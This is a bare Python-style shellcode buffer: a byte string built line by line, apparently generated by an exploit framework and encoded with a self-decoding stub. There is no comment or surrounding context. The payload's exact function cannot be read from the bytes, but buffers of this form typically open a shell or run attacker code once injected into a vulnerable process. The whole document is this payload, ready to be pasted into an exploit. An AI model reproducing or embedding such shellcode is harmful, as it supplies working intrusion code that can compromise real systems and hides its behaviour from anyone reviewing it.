buf =  ""
buf += "\x33\xc9\x83\xe9\xbc\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xc7\x28\x3f\xd0\x83\xee\xfc\xe2\xf4\x1e\xc3"
buf += "\xa4\x09\xb3\x0c\xcb\xe1\x15\x9a\x48\xe1\x0e\x4c\xb4"
buf += "\xa1\xf7\xa3\x49\xdc\x4c\x5e\x23\x5b\x81\x20\xb4\xae"
buf += "\xe7\xa3\x09\xe8\x88\x30\x4a\x23\x9e\x29\xee\x2f\x26"
buf += "\x48\xb4\xbc\xe3\x0c\xb4\x95\xfb\xa3\x6b\xf8\xbf\x29"
buf += "\xd5\x5b\x8d\x30\xb4\x8a\xe7\x29\xd4\x33\xf3\x61\xb4"
buf += "\xe4\x4c\x29\xd1\xe1\x38\x19\xff\x2c\x6b\xac\xff\xa4"
buf += "\xc0\xe9\xf0\xdd\xc6\xef\xd4\x24\xfc\x54\x1b\xf8\xb2"
buf += "\xc9\xb4\x8a\xe3\x29\xd4\xb6\x4c\x24\x74\x5b\x9d\x34"
buf += "\x3e\x3b\x4c\x2c\xb4\xd1\x2f\xa1\x7b\xf4\xdb\x49\xfc"
buf += "\x62\xcf\x01\xeb\x59\x22\xa1\xfd\xb8\x49\x66\x31\x3c"
buf += "\x95\xc0\xa0\x2f\x38\xd7\xb6\x95\xc3\x93\x41\x08\x25"
buf += "\x5b\xb8\xcc\xe3\x7a\xd7\x5e\x38\xd7\xc0\x59\x82\x20"
buf += "\x57\xbc\xab\x08\x7e\xb8\xf4\x1a\x11\xb4\xaf\x5d\x4c"
buf += "\xb5\xb5\x18\xe4\x58\x9b\x0c\x35\x59\x21\x7e\xc0\x85"
buf += "\xc3\xa1\xfd\x80\x7c\x80\x9d\x9d\x7b\xaf\x23\xf4\x95"
buf += "\xc0\x60\x2f\x38\xd7\x57\xbf\xbf\x70\x1f\xb8\xa6\x4f"
buf += "\x5a\x92\xaf\x65\x5a\xa3\xb4\x19\xe4\x58\x9b\x0c\x35"
buf += "\x59\x24\x40\x67\xf0\xe7\x08\x57\xb4\xa6\x46\x56\xb8"
buf += "\xac\x47\x1f\xbe\xaf\x4d\x5a\xf0\xa6\x40\x78\xb1\xab"
buf += "\x4f\x0e\x19\x4f\x64\x1b\xc0\x4e\xc9\x0e\x02\x95\x7b"
buf += "\x6e\x82\x38\xf8\x0e\x10\x97\xd7\x6a\xd8"
